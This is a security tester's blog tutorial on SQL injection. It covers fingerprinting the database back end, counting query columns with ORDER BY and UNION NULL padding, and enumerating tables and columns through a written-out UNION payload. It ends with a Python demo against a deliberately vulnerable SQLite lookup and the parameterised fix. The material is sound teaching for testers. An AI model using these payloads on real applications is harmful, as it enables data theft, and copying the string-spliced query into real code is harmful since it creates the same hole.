Being a security tester, I have one of the most demanding and creative jobs in my profession. We testers are asked to identify as many significant security vulnerabilities in an application as we can, given limited time and resources. We have to explore the application in less time than the developers who built it took to write it, and we have to find every vulnerability present, while an attacker conveniently has all the time and resources in the world and only needs to find one. Well, that is what makes this job interesting and challenging.
As SQL injection continues to be one of the most common techniques for stealing data, I would like to dedicate this blog to the topic in an effort to help eliminate the problem. Let's get started with the basics of how to identify an injection point.
SQL Injection :
SQL injection testing tools such as sqlmap can identify likely injection points for you. They try a wide range of the ways in which, and places where, an attacker would exploit an application. A tool only automates the probes described below, though, so it is worth understanding them by hand.
How to discover which Database server might be exploited?
This is essential because the syntax of every probe you send depends on which database engine sits behind the application. Before getting started, there is a method called 'guessing'.
If your web site or web application uses page extensions like .asp or .aspx, there is a good chance the back end is SQL Server or MS Access. If the extension is .jsp, it could well be Oracle. If the extension is .php, the database is often MySQL or PostgreSQL. This is only a rough correlation between technology stacks, however, and when the guess is wrong the actual work begins. Let's see how a beginner can identify the database.
For SQL Server, 'TESTING' and 'TEST' + 'ING' are the same string.
In Oracle (and PostgreSQL), 'TESTING' and 'TEST' || 'ING' are the same string. MySQL instead uses CONCAT('TEST', 'ING') and, unless the PIPES_AS_CONCAT SQL mode is enabled, treats || as logical OR.
So when we supply 'TEST' || 'ING' in place of 'TESTING' and get an error, or a response that differs from the one 'TESTING' produces, the back end is unlikely to be Oracle or PostgreSQL, and we move on to the next engine's concatenation syntax until one behaves exactly like the plain string. The comparison has to be against the known-good response for 'TESTING': on some engines a wrong operator does not error at all but silently evaluates to a different value, so 'no error' on its own is not a match.
Next, engine-specific functions narrow it down further: version strings (@@version on SQL Server and MySQL, version() on PostgreSQL, the v$version view on Oracle), date functions (GETDATE() on SQL Server, NOW() on MySQL and PostgreSQL, SYSDATE on Oracle) and the accepted join and comment syntax all differ between back ends.
Samples for SQL Injection :
These are the most common probes we start with, though we are not confined to them:
- Discover the tables of the DB
- Discover the columns of a table
- Using 'ORDER BY' syntax to find the number of columns in the query result
Discover the tables of DB
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
This query lists the user-defined tables (and views) in the database. It works on SQL Server, MySQL and PostgreSQL; Oracle has no INFORMATION_SCHEMA and exposes the same information through ALL_TABLES instead.
Discover columns of table
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Accounts'
This query lists the column names of the Accounts table (on Oracle, ALL_TAB_COLUMNS serves the same purpose).
UNION SELECT COLUMN1_NAME, NULL, NULL, NULL, NULL, NULL
can be helpful. Using 'UNION' we can find the number of columns in the application's own query: a UNION is only accepted when both SELECTs return the same number of columns, so we add or remove NULLs until the error disappears. No column name is needed for this step (an all-NULL SELECT works); once the count is known, one NULL is swapped for the column whose contents we want to read.
When that succeeds, we try a 'SELECT' statement of the same shape the application itself is running:
Select * from TABLE_NAME where COLUMN_NAME = 'TESTING'
Numerous attempts (guessing) may be required to find a table and column name when INFORMATION_SCHEMA is not readable.
Once you know the application's query shape, supplying the value below as the input both confirms the number of columns and pulls the table list into the result:
TESTING' UNION SELECT TABLE_NAME, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES --
which the application assembles into
select * from TABLE_NAME where COLUMN_NAME = 'TESTING' UNION SELECT TABLE_NAME, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES --'
Note the single quote at the start of the payload: it closes the application's string literal so that the rest of the input is parsed as SQL, and the trailing -- comments out the application's own closing quote. If the query errors, adjust the number of NULLs; when it succeeds, the column count is confirmed.
Using 'ORDER BY' syntax to find the number of columns
An alternative to counting NULLs is 'ORDER BY' with a column position. ORDER BY n sorts on the n-th column of the result, so it errors as soon as n exceeds the number of columns in the application's query. This counts columns, not records: it says nothing about how many rows the table holds.
select * from TABLE_NAME where COLUMN_NAME = '' Order by 1
This query never errors on its own, because every result has at least one column; an error here means the injection itself is malformed (a wrong quote or comment style for this back end).
select * from TABLE_NAME where COLUMN_NAME = '' Order by 200
If this query throws an error, the application's query has fewer than 200 columns.
select * from TABLE_NAME where COLUMN_NAME = '' Order by 100
Stepping the number up or down (a binary search works well) until you find the last value that does not error gives the exact column count, which is the number of NULLs the UNION needs. Use single quotes for the string: on SQL Server double quotes delimit identifiers, not strings, and would break the probe for a different reason.
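To tie the concatenation fingerprint and the column-count and catalogue-enumeration steps above together, here is an added example that is not part of the original post: a deliberately vulnerable lookup function over a constructed in-memory SQLite database, with the probes driven from Python. SQLite stands in for the real back end. Its concatenation operator is || (as in Oracle and PostgreSQL), its sqlite_master table and pragma_table_info() function play the roles of INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS, and the Accounts and Audit tables, their columns and their rows are all assumptions made up for the example.

```python
import sqlite3

# Constructed sample schema standing in for a real back end. The table and
# column names are assumptions made for this example only.
SCHEMA = """
CREATE TABLE Accounts (id INTEGER, username TEXT, email TEXT, balance REAL, notes TEXT);
INSERT INTO Accounts VALUES (1, 'alice', 'alice@example.invalid', 10.5, 'vip');
INSERT INTO Accounts VALUES (2, 'bob',   'bob@example.invalid',    3.0, NULL);
CREATE TABLE Audit (id INTEGER, message TEXT);
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    """The flaw under test: user input is spliced straight into the SQL text,
    so a single quote in the input ends the string literal and whatever
    follows is parsed as SQL."""
    sql = f"SELECT * FROM Accounts WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> list:
    """The fix: a bound parameter is sent as data and is never parsed as SQL."""
    return conn.execute("SELECT * FROM Accounts WHERE username = ?", (username,)).fetchall()


def probe(conn: sqlite3.Connection, payload: str):
    """Send one payload through the vulnerable function.
    Returns (rows, None) if the back end accepted it, (None, error) if not."""
    try:
        return vulnerable_lookup(conn, payload), None
    except sqlite3.Error as exc:
        return None, str(exc)


def concat_probe(conn: sqlite3.Connection, operator: str) -> bool:
    """Concatenation fingerprint: does 'al' <operator> 'ice' equal 'alice'?
    True means this operator concatenates strings on this back end. The test
    compares against the known-good row for alice, not merely for an error."""
    rows, err = probe(conn, f"alice' AND 'al'{operator}'ice' = 'alice")
    return err is None and len(rows) == 1


def count_columns_order_by(conn: sqlite3.Connection, limit: int = 64) -> int:
    """Raise the ORDER BY index until the back end errors; the last index that
    worked is the number of columns in the application's SELECT."""
    found = 0
    for i in range(1, limit + 1):
        _, err = probe(conn, f"' ORDER BY {i} --")
        if err is not None:
            break
        found = i
    return found


def count_columns_union(conn: sqlite3.Connection, limit: int = 64) -> int:
    """Same answer by the other route: a UNION only parses when both sides
    have the same column count, so add NULLs until it stops erroring."""
    for i in range(1, limit + 1):
        _, err = probe(conn, "' UNION SELECT " + ", ".join(["NULL"] * i) + " --")
        if err is None:
            return i
    return 0


def union_column(conn: sqlite3.Connection, ncols: int, expr: str, source: str) -> list:
    """Pull one catalogue column into the first result column, padding the rest
    with NULL so the UNION lines up. 'xyz' is a username that does not exist,
    so only the injected rows come back."""
    pad = ", NULL" * (ncols - 1)
    rows, err = probe(conn, f"xyz' UNION SELECT {expr}{pad} FROM {source} --")
    if err is not None:
        raise RuntimeError(err)
    return sorted(r[0] for r in rows)


def enumerate_tables(conn: sqlite3.Connection, ncols: int) -> list:
    # sqlite_master is SQLite's analogue of INFORMATION_SCHEMA.TABLES
    return union_column(conn, ncols, "name", "sqlite_master WHERE type = 'table'")


def enumerate_columns(conn: sqlite3.Connection, ncols: int, table: str) -> list:
    # pragma_table_info() is SQLite's analogue of INFORMATION_SCHEMA.COLUMNS
    return union_column(conn, ncols, "name", f"pragma_table_info('{table}')")


def run_enumeration() -> dict:
    """Run the whole procedure in order and return every intermediate result."""
    conn = build_db()
    ncols = count_columns_order_by(conn)
    catalogue_payload = "xyz' UNION SELECT name, NULL, NULL, NULL, NULL FROM sqlite_master --"
    return {
        "concat_pipes": concat_probe(conn, "||"),
        "concat_plus": concat_probe(conn, "+"),
        "ncols_order_by": ncols,
        "ncols_union": count_columns_union(conn),
        "tables": enumerate_tables(conn, ncols),
        "accounts_columns": enumerate_columns(conn, ncols, "Accounts"),
        "safe_lookup_rows": safe_lookup(conn, catalogue_payload),
    }


if __name__ == "__main__":
    for key, value in run_enumeration().items():
        print(f"{key}: {value}")
```

Run it directly to print each probe's result. Two things are worth noticing. The + probe does not error on SQLite: 'al'+'ice' silently evaluates to 0, so the fingerprint has to compare against the known-good response rather than look for an error, which is the caveat made above about concatenation tests. And the last entry sends the very same catalogue-dumping payload through the parameterised query and gets no rows back, because a bound parameter is never parsed as SQL; that is the fix the application needs.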
There are more advanced forms of injection, such as bypassing user-level login, which I will write about in forthcoming blogs. Stay with us for all that and more on other security testing techniques.